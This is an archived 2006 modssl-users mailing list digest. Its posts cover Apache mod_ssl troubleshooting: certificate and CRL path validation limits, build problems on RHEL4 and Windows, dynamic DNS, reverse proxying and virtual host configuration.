X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi There:

The limitations of mod_ssl for path validation are further than what you ha=
ve=20
described, in that it also cannot perform policy mapping up the entire=20
certificate chain, and also has no concept of how to deal with AIA or SIA=20
fields. I'm not sure where the developers are in terms of full RFC 3280 Pat=
h=20
Validation compliance, but as we also have a need for more full path=20
validation, especially a model that will work in a Cross-Certification type=
=20
environment.

It is our intent to be starting to work on this this fall, unless we hear f=
rom=20
the community that there is already work underway to add in full 3280=20
validation to mod_ssl.

(I'll probably take this over to modssl-devel, but since you asked, I thoug=
ht=20
that I would bring it up here.)

Cheers.

On Thursday 31 August 2006 08:53, rlabbe@satx.rr.com wrote:
> All,
>
> I am working in an environment utilizing a PKI consisting of several
> Root and Intermediate Certificate Authorities. In order to reduce the
> overhead when requiring client authentication using digital
> certificates, I am using the following two directives:
>
> SSLCACertificatePath =96 Used for Root and Intermediate CAs
> SSLCARevocationPath =96 Used to Process Certificate Revocation Lists
>
> I=92ve yet to encounter a version of Apache and Mod_SSL performing proper
> path validation. If a user presents a certificate that is revoked, but
> not included in the directory containing all the PEM/Base64 encoded CRL
> files and associated symbolic links, Apache allows access.
>
> If a user presents a certificate issued from an Intermediate
> Certificate Authority that is not included in the directory containing
> all the Root and Intermediate CA certificates in PEM/Base64 encoded
> format and associated symbolic links, he/she is allowed access.
>
> I would prefer the system to validate the entire chain and not allow
> access in the event a local CRL file or Intermediate CA certificate is
> not available. By default, IIS performs this path validation correctly.
> If IIS does not have a current CRL file issued by each and every CA in
> the certificate path, the client is denied access. If IIS does not have
> a certificate from each and every CA in the certificate path, the
> client is denied access.
>
> I am trying to automate the process of updating the CA certificate
> directory and associated CRL directories by scheduling a job to run on
> a nightly basis. If Apache has a local CRL and CA certificate from each
> and every CA in the path used to issue the client certificates, then
> all checks are performed and the client is properly validated.
>
> I would prefer the system default to =93Closed=94 instead of =93Open=94 i=
n the
> event an Intermediate CA certificate is unavailable or no CRL file is
> available. Again, the system must have at least one CA certificate
> trusted and available locally, but no CRL files.
>
> Note: I have issued a client certificate from a client certificate
> issued by on of the Intermediate CAs and Apache does deny access
> because the key usage of the client certificate does not allow it to be
> used as a Root CA and issue additional client certificates. I used
> OpenSSL in order to issue client certificates from a client
> certificate. This type of path validation seems to work on all the
> versions of Apache and Mod_SSL I=92ve tested.
>
> Thanks
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

=2D-=20
Patrick Patterson
President and CEO
Carillon Information Security Inc.
http://www.carillon.ca
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 31 15:17:39 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 1EA1D14D84B; Thu, 31 Aug 2006 15:17:39 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from relais.videotron.ca (relais.videotron.ca [24.201.245.36])
	by master.modssl.org (Postfix) with ESMTP id 0599A14D867
	for ; Thu, 31 Aug 2006 15:17:37 +0200 (CEST)
Received: from avril.internal.test ([66.131.181.208])
 by VL-MH-MR001.ip.videotron.ca
 (Sun Java System Messaging Server 6.2-2.05 (built Apr 28 2005))
 with SMTP id <0J4V002P1698K2E0@VL-MH-MR001.ip.videotron.ca> for
 modssl-users@modssl.org; Thu, 31 Aug 2006 09:17:32 -0400 (EDT)
Received: (qmail 12615 invoked from network); Thu, 31 Aug 2006 13:17:32 +0000
Received: from unknown (HELO ?192.168.42.128?) (192.168.42.128)
 by avril.internal.test with SMTP; Thu, 31 Aug 2006 13:17:32 +0000
Date: Thu, 31 Aug 2006 09:17:10 -0400
From: Patrick Patterson 
Subject: Re: Certificate and CRL Path Validation Error
In-reply-to: <200608310914.07818.ppatterson@carillonis.com>
To: modssl-users@modssl.org
Message-id: <200608310917.10886.ppatterson@carillonis.com>
Organization: Carillon Information Security Inc.
MIME-version: 1.0
Content-type: text/plain; charset=windows-1252
Content-transfer-encoding: 7BIT
Content-disposition: inline
References: 
 <200608310914.07818.ppatterson@carillonis.com>
User-Agent: KMail/1.9.4
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Patrick Patterson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thursday 31 August 2006 09:14, Patrick Patterson wrote:

> (I'll probably take this over to modssl-devel, but since you asked, I
> thought that I would bring it up here.)
>

Hmm - I thought there WAS a developers mailing list, but apparently I was 
mistaken - so I guess I have to ask is this the right place to have 
discussions about the best way to add in the capability for mod_ssl to do 
full 3280 path validation?

Thanks.

-- 
Patrick Patterson
President and CEO
Carillon Information Security Inc.
http://www.carillon.ca
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 31 23:37:36 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E468F14D88E; Thu, 31 Aug 2006 23:37:35 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ug-out-1314.google.com (ug-out-1314.google.com [66.249.92.170])
	by master.modssl.org (Postfix) with ESMTP id A46E414D84B
	for ; Thu, 31 Aug 2006 23:37:33 +0200 (CEST)
Received: by ug-out-1314.google.com with SMTP id j40so718349ugd
        for ; Thu, 31 Aug 2006 14:37:28 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition;
        b=HZp5Wltfmt3Ck3mxpLBnEXoHv04VwdFEfmgbrU/bS6oXM5zKyz+SCPyRBCOrJAf8YBIhpVyne4Rn6G4jYfykeB8oSYPRjQSRmEdspUM3Bw4eY7f7ZLwOSkKixps3QtyYFMHm1pALh7UJuNHqmVSZc6AerYFq7m7ymfk5S1h0ZCo=
Received: by 10.66.220.17 with SMTP id s17mr805069ugg;
        Thu, 31 Aug 2006 14:37:28 -0700 (PDT)
Received: by 10.66.239.6 with HTTP; Thu, 31 Aug 2006 14:37:28 -0700 (PDT)
Message-ID: 
Date: Thu, 31 Aug 2006 17:37:28 -0400
From: "hbeaumont hbeaumont" 
To: modssl-users@modssl.org
Subject: problem with redhat enterprise linux 4 (rhel4 rhe4)
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "hbeaumont hbeaumont" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I have a working install that I use for redhat enterprise linux 3:

(from my .spec file)

cd mod_ssl-2.8.28-1.3.37
./configure \
--with-perl=/usr/bin/perl \
--with-apache=../apache_%{apversion} \


cd apache_%{apversion}

SSL_BASE="/usr/" \
./configure \
--with-perl=/usr/bin/perl \
--enable-shared=max \
--enable-suexec \
--suexec-caller=nobody \
--suexec-docroot="/home" \
--suexec-userdir="www" \
--enable-module=ssl \
--enable-module=rewrite


This works fine on RHEL3, but when I try to use the same config on
redhat enterprise 4 I get the following behavior.

All SSL hits return a blank page.

ssl_engine_log shows:

[31/Aug/2006 17:26:07 12662] [info]  Connection to child 28
established (server myserver.com:443, client 192.168.1.100)
[31/Aug/2006 17:26:07 12662] [info]  Seeding PRNG with 1160 bytes of entropy

access_log shows nothing.

selinux is not on.

I can't seem to find what is wrong.

ssl is :

openssl-devel-0.9.7a-43.8
openssl-0.9.7a-43.8

mod_ssl is  mod_ssl-2.8.28-1.3.37.tar.gz
apache is apache_1.3.37.tar.gz

I'm stumped. Any ideas?
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Sep  2 01:50:17 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A317614DEBF; Sat,  2 Sep 2006 01:50:17 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nf-out-0910.google.com (nf-out-0910.google.com [64.233.182.189])
	by master.modssl.org (Postfix) with ESMTP id C5BB614D85B
	for ; Sat,  2 Sep 2006 01:50:16 +0200 (CEST)
Received: by nf-out-0910.google.com with SMTP id c31so753987nfb
        for ; Fri, 01 Sep 2006 16:50:09 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:mime-version:content-type;
        b=C9+vJ86wY0N03dR90DT5w/8WJVB2CysUPP7slqnRnVipEf46X9QTUnEZpHNt8aV0K861299Zrp51Q/EFDZobKEDlNITfIbokU2Ncgj8UNP4nAa1Xnho4wYpbwuu3RQB6uOH5Duc3rDcmgcWWp8eTqqEhNPyQiBDlFRhXu4WlOdE=
Received: by 10.49.41.12 with SMTP id t12mr3616844nfj;
        Fri, 01 Sep 2006 16:50:09 -0700 (PDT)
Received: by 10.49.17.14 with HTTP; Fri, 1 Sep 2006 16:50:09 -0700 (PDT)
Message-ID: <51c8a7be0609011650l4e0da8eal43497766cf85b03d@mail.gmail.com>
Date: Fri, 1 Sep 2006 19:50:09 -0400
From: "jeff sacksteder" 
To: modssl-users@modssl.org
Subject: problem with dynamic dns
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_141767_566158.1157154609134"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "jeff sacksteder" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_141767_566158.1157154609134
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

I have an Apache2/ssl server on a dynamic ip address with dns serviced by a
dynamic dns provider. The problem is that if the address changes, after the
dynamic record gets updated, ssl no longer works.  Any resources for which
ssl is mandatory produce only server errors.

Apache seems to cache some sort of dns information in-process on startup.
Restarting my httpd proccesses fixes the symptom, but I don't want to
restart it every 15 minutes. I'd like to know what is happening and what to
do to mitigate this..

------=_Part_141767_566158.1157154609134
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

I have an Apache2/ssl server on a dynamic ip address with dns serviced by a dynamic dns provider. The problem is that if the address changes, after the dynamic record gets updated, ssl no longer works.  Any resources for which  ssl is mandatory produce only server errors.


Apache seems to cache some sort of dns information in-process on startup. Restarting my httpd proccesses fixes the symptom, but I don't want to restart it every 15 minutes. I'd like to know what is happening and what to do to mitigate this..



------=_Part_141767_566158.1157154609134--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep  4 10:17:26 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2221F14D88C; Mon,  4 Sep 2006 10:17:24 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id 0D00114D82F
	for ; Mon,  4 Sep 2006 10:17:22 +0200 (CEST)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.12.11.20060308/8.12.11) with ESMTP id k848HG1Y027901
	for ; Mon, 4 Sep 2006 04:17:16 -0400
Received: from radish.cambridge.redhat.com (radish.cambridge.redhat.com [172.16.18.90])
	by int-mx1.corp.redhat.com (8.12.11.20060308/8.12.11) with ESMTP id k848HFuW003432
	for ; Mon, 4 Sep 2006 04:17:16 -0400
Received: from radish.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by radish.cambridge.redhat.com (8.13.7/8.13.7) with ESMTP id k848HEGo025399
	for ; Mon, 4 Sep 2006 09:17:15 +0100
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.13.7/8.13.7/Submit) id k848HEVw025398
	for modssl-users@modssl.org; Mon, 4 Sep 2006 09:17:14 +0100
X-Authentication-Warning: radish.cambridge.redhat.com: jorton set sender to jorton@redhat.com using -f
Date: Mon, 4 Sep 2006 09:17:14 +0100
From: Joe Orton 
To: modssl-users@modssl.org
Subject: Re: Certificate and CRL Path Validation Error
Message-ID: <20060904081714.GA24013@redhat.com>
Mail-Followup-To: modssl-users@modssl.org
References:  <200608310914.07818.ppatterson@carillonis.com> <200608310917.10886.ppatterson@carillonis.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
In-Reply-To: <200608310917.10886.ppatterson@carillonis.com>
User-Agent: Mutt/1.4.2.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, Aug 31, 2006 at 09:17:10AM -0400, Patrick Patterson wrote:
> On Thursday 31 August 2006 09:14, Patrick Patterson wrote:
> 
> > (I'll probably take this over to modssl-devel, but since you asked, I
> > thought that I would bring it up here.)
> >
> 
> Hmm - I thought there WAS a developers mailing list, but apparently I was 
> mistaken - so I guess I have to ask is this the right place to have 
> discussions about the best way to add in the capability for mod_ssl to do 
> full 3280 path validation?

New mod_ssl development generally happens in the httpd 2.x tree, so 
dev@httpd.apache.org is where it is discussed.  I don't think Ralf is 
adding new features to mod_ssl 2.8 any more.

Regards,

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep  5 17:49:27 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5B2C414DCC8; Tue,  5 Sep 2006 17:49:27 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nf-out-0910.google.com (nf-out-0910.google.com [64.233.182.186])
	by master.modssl.org (Postfix) with ESMTP id 287E114D833
	for ; Tue,  5 Sep 2006 17:49:26 +0200 (CEST)
Received: by nf-out-0910.google.com with SMTP id a4so1465473nfc
        for ; Tue, 05 Sep 2006 08:49:21 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:mime-version:content-type;
        b=AQuza0IIjNcWgq2Zys28Ltn4nmXg/BQwFIHUD2aNwWwxkCrupxZvfKGF5YKncAD57Yh53DZYoZWetVBpya0cpy2ByYeKFBjVOmWpyqQhzcpO3x0CdwvAsDLZACO3038+j/Dq9iO1YXDqr0ZK4/5/OpzEG1qHKnp28TzdiTJ31NU=
Received: by 10.67.29.12 with SMTP id g12mr3720664ugj;
        Tue, 05 Sep 2006 08:49:21 -0700 (PDT)
Received: by 10.67.21.20 with HTTP; Tue, 5 Sep 2006 08:49:20 -0700 (PDT)
Message-ID: 
Date: Tue, 5 Sep 2006 18:49:20 +0300
From: "Abdul Rasheed" 
To: modssl-users@modssl.org
Subject: Proxy Pass with SSL redirect
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_168569_14666860.1157471360959"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Abdul Rasheed" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_168569_14666860.1157471360959
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Hi,

I have an SSL enabled Apache server at the front end and BEA Web logic at
the backend. Recently I have installed SSL certificate successfully and I
have redirected all http requests to https by adding the following line at
httpd.conf file,

>
ServerName www.mydomain.com
RewriteEngine On
RewriteCond %{HTTPS} !=on
RewriteRule ^/(.*) https://%{SERVER_NAME}/$1 [L,R,NC]


It works smoothly, but the problem is I can't access the page that is
actually located at the back end web logic server, which is accessed using
proxy pass. If I access the pages that is on back end server using http it
works. Following is the proxy pass portion of httpd.conf file,



ProxyRequests Off

ProxyPass /topup http://192.xxx.xxx.xxx:8080/topup
ProxyPassReverse /topup http://192.xxx.xxx.xxx:8080/topup





My Goal is to forward all http requests to https. Do I really need to
install SSL Certificates on the back end server?  Is there any way to
accomplish my goal without installing SSL Certificate on the back end
server?



I hope it's clear and hope to having a solution soon.

Best regards,
A.rasheed

------=_Part_168569_14666860.1157471360959
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline


Hi,


I have an SSL enabled Apache server at the front end and BEA Web logic at the backend. Recently I have installed SSL certificate successfully and I have redirected all http requests to https by adding the following line at 
httpd.conf file,


<VirtualHost www.mydomain.com:80>
ServerName www.mydomain.com
RewriteEngine On
RewriteCond %{HTTPS} !=on
RewriteRule ^/(.*) 
https://%{SERVER_NAME}/$1 [L,R,NC]
</VirtualHost>


It works smoothly, but the problem is I can't access the page that is actually located at the back end web logic server, which is accessed using proxy pass. If I access the pages that is on back end server using http it works. Following is the proxy pass portion of 
httpd.conf file,


<IfModule mod_proxy.c>


ProxyRequests Off


ProxyPass /topup http://192.xxx.xxx.xxx:8080/topup
ProxyPassReverse /topup http://192.xxx.xxx.xxx:8080/topup


</IfModule>


 


My Goal is to forward all http requests to https. Do I really need to install SSL Certificates on the back end server?  Is there any way to accomplish my goal without installing SSL Certificate on the back end server?



 


I hope it's clear and hope to having a solution soon.


Best regards,
A.rasheed


------=_Part_168569_14666860.1157471360959--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep  5 21:25:21 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B334A14D866; Tue,  5 Sep 2006 21:25:21 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from stone.dakcs.com (stone.dakcs.com [207.109.153.103])
	by master.modssl.org (Postfix) with ESMTP id A363614D833
	for ; Tue,  5 Sep 2006 21:25:20 +0200 (CEST)
Received: from MGGII ([172.27.224.236])
	by stone.dakcs.com (8.13.6/8.12.6/avav) with SMTP id k85JPDIU029556
	for ; Tue, 5 Sep 2006 13:25:13 -0600 (MDT)
	(envelope-from mgglist@pdc4u.com)
From: "Michael Goodell" 
To: "~modssl users" 
Subject: mod_ssl / Apache 2.2.3 / Windows
Date: Tue, 5 Sep 2006 13:25:13 -0600
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2962
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Michael Goodell" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

We are trying to implement: Windows XP, Apache 2.2.3, mod_ssl and running
into problems.

Question:

Is it possible to do this under Windows without compiling Apache from
source?

We were able to get it to work using Apache 2.0.59 after some wrangling with
OpenSSL and cert creation.
(Had to create the certs on a Unix (FreeBSD) system / OpenSSL install)

I would like to ask if there is a how-to document for mod_ssl / Apache 2.2.3
/ Winderz that covers how to do this successfully.

We keep running into Apache complaining it cannot load / find the mod_ssl.so
module. We have taken the proper steps in adding

LoadModule ssl_module modules/mod_ssl.so to the httpd.conf file and adding
the mod_ssl.so file to the modules directory. But every time we attempt to
start the server it fails with the error cannot load / find the mod_ssl.so
file. Are there other files missing? We have OpenSSL installed and the
libeay32.dll & ssleay32.dll installed in system32 directory.

Is there a precompiled mod_ssl.so available for Windows?

Thanks a lot for any direction.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  6 20:10:38 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8103C14D884; Wed,  6 Sep 2006 20:10:38 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from penguin.leapcash.com (leapcash.com [66.98.242.36])
	by master.modssl.org (Postfix) with ESMTP id D3DE314D841
	for ; Wed,  6 Sep 2006 20:10:33 +0200 (CEST)
Received: from d149-67-251-101.try.wideopenwest.com ([67.149.101.251] helo=andrewlaptop)
	by penguin.leapcash.com with esmtp (Exim 4.52)
	id 1GL1r6-0004dR-6c
	for modssl-users@modssl.org; Wed, 06 Sep 2006 14:10:33 -0400
From: "Andrew Rosolino" 
To: 
Subject: Setting Apache as Single Domain not Whole Root.
Date: Wed, 6 Sep 2006 14:12:55 -0500
Organization: ShiftCode
Message-ID: <002b01c6d1e8$76d58380$c901a8c0@andrewlaptop>
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_002C_01C6D1BE.8DFF7B80"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.6626
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1807
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - penguin.leapcash.com
X-AntiAbuse: Original Domain - modssl.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - shiftcode.com
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Andrew Rosolino" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_002C_01C6D1BE.8DFF7B80
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

I currently bought https:// for my site dtdyno.com. The problem is that if
you type https:// for my other sites it will forward to http://dtdyno.com
 .

 

For example:

https://shiftcode.com   goes to https://dtdyno.com
 

https://dtdyno.com   goes to https://dtdyno.com
 

 

I do not want it to-do that for the other domains, only dtdyno.com.

 

Here is my a chunk from my httpd.conf

 





ServerAlias www.dtdyno.com dtdyno.com

BytesLog domlogs/secure2.dtdyno.com-bytes_log

ServerName secure2.dtdyno.com

ScriptAlias /cgi-bin/ /home/dtdyno/public_html/cgi-bin/

ServerAdmin webmaster@dtdyno.com

DocumentRoot /home/dtdyno/public_html

User dtdyno

Group dtdyno

SSLEnable

SSLCertificateFile /home/dtdyno/ssl/certs/dtdyno.com.crt

SSLCertificateKeyFile /home/dtdyno/ssl/private/dtdyno.com.key

SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown





-------------------------------------------------------

 

Sincerely,

Andrew Rosolino

ShiftCode.com

 


------=_NextPart_000_002C_01C6D1BE.8DFF7B80
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable



















I currently bought https:// for my site dtdyno.com. =
The
problem is that if you type https:// for my other sites it will forward =
to http://dtdyno.com.



 



For example:



https://shiftcode.com goes
to https://dtdyno.com



https://dtdyno.com goes to
https://dtdyno.com



 



I do not want it to-do that for the other domains, =
only
dtdyno.com.



 






Here is my a chunk from my =
httpd.conf






 



<IfDefine SSL>



<VirtualHost =
66.98.242.36:443>



ServerAlias www.dtdyno.com =
dtdyno.com



BytesLog =
domlogs/secure2.dtdyno.com-bytes_log



ServerName secure2.dtdyno.com



ScriptAlias /cgi-bin/ =
/home/dtdyno/public_html/cgi-bin/



ServerAdmin webmaster@dtdyno.com



DocumentRoot =
/home/dtdyno/public_html



User dtdyno



Group dtdyno



SSLEnable



SSLCertificateFile =
/home/dtdyno/ssl/certs/dtdyno.com.crt



SSLCertificateKeyFile =
/home/dtdyno/ssl/private/dtdyno.com.key



SetEnvIf User-Agent ".*MSIE.*" nokeepalive =
ssl-unclean-shutdown



</VirtualHost>



</IfDefine>



------------------------------------------------------=
-



 



Sincerely,



Andrew Rosolino



ShiftCode.com



 









------=_NextPart_000_002C_01C6D1BE.8DFF7B80--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  6 21:25:17 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8F61414D884; Wed,  6 Sep 2006 21:25:17 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from pm2.ctc.com (pm2.ctc.com [147.160.99.125])
	by master.modssl.org (Postfix) with ESMTP id 2205314D841
	for ; Wed,  6 Sep 2006 21:25:16 +0200 (CEST)
Received: from server3a.ctc.com (server3a.ctc.com [10.160.17.12])
	by pm2.ctc.com (8.13.1/8.13.1) with ESMTP id k86JP6qu008449
	for ; Wed, 6 Sep 2006 15:25:06 -0400
Received: from ctc-mail2.ad.ctcgsc.org (ctc-mail2.ad.ctcgsc.org [10.160.3.21])
	by server3a.ctc.com (Switch-3.2.3/Switch-3.2.3) with ESMTP id k86JP9rq005267
	for ; Wed, 6 Sep 2006 15:25:09 -0400
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: RE: Question regarding IfDefine tags
Date: Wed, 6 Sep 2006 15:26:53 -0400
Message-ID: <3DE2FA456834134B97A948E9044FB51D0194F0@ctc-mail2.ad.ctcgsc.org>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Question regarding IfDefine tags
Thread-Index: AcbLuPYNL3ck9wF1S6e1Ru8DcxEhyAGMIy4A
From: "Gaydosh, Adam" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gaydosh, Adam" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Make sure you have these statements in your httpd.conf:
LoadModule ssl_module modules/mod_ssl.so

    Include conf/ssl.conf
 

As for your ssl.conf, there are couple things that could be tripping you
up, you can try posted a scrubbed version if you'd like, but the first
thing you need to ensure is "SSLEngine on"...also, I have # commented out if that is what you were referring too?  When your
service starts, what does the browser return when you access https?  Can
you see that socket actually open e.g. netstat? 

>-----Original Message-----
>From: owner-modssl-users@modssl.org 
>[mailto:owner-modssl-users@modssl.org] On Behalf Of Robert Denton
>Sent: Tuesday, August 29, 2006 6:16 PM
>To: modssl-users@modssl.org
>Subject: Question regarding IfDefine tags
>
>Hello all,
>
>I am hoping someone can clarify this for me:
>
>I am using OpenSSL with Apache2 on windows server.  I do not 
>believe that my ssl.conf file is being read when I start the 
>apache service although it is included by http.conf.
>
>I found a snipet online indicating you either need to start 
>apache with -D SSL, or comment out the IfDefine tags in the 
>ssl.conf.  When I do either of these and restart the apache 
>service, the service will not start.
>
>If I do neither of these things, the service starts but I 
>cannot access pages via https. So my question is two-fold:
>
>1. Why will the service not start when the IfDefine tags are 
>commented out. Is it because apache is now trying to parse the 
>contents of ssl.conf but running into something it doesn't 
>understand? If so, wouldn't this show in error.log?
>
>2. Is there a more appropriate forum or mailing list to take 
>my troubles to?
>
>Thanks!
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>

------------------------------------------------------------
This message and any files transmitted within are intended
solely for the addressee or its representative and may
contain proprietary or confidential information.  If you are
not the intended recipient, notify the sender immediately
and delete this message.  Publication, reproduction,
forwarding, or content disclosure is prohibited without the
consent of the original sender and may be unlawful.

Concurrent Technologies Corporation and its Affiliates.
www.ctc.com  1-800-282-4392
------------------------------------------------------------
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Sep 16 18:28:30 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E7D9114D8A6; Sat, 16 Sep 2006 18:28:30 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
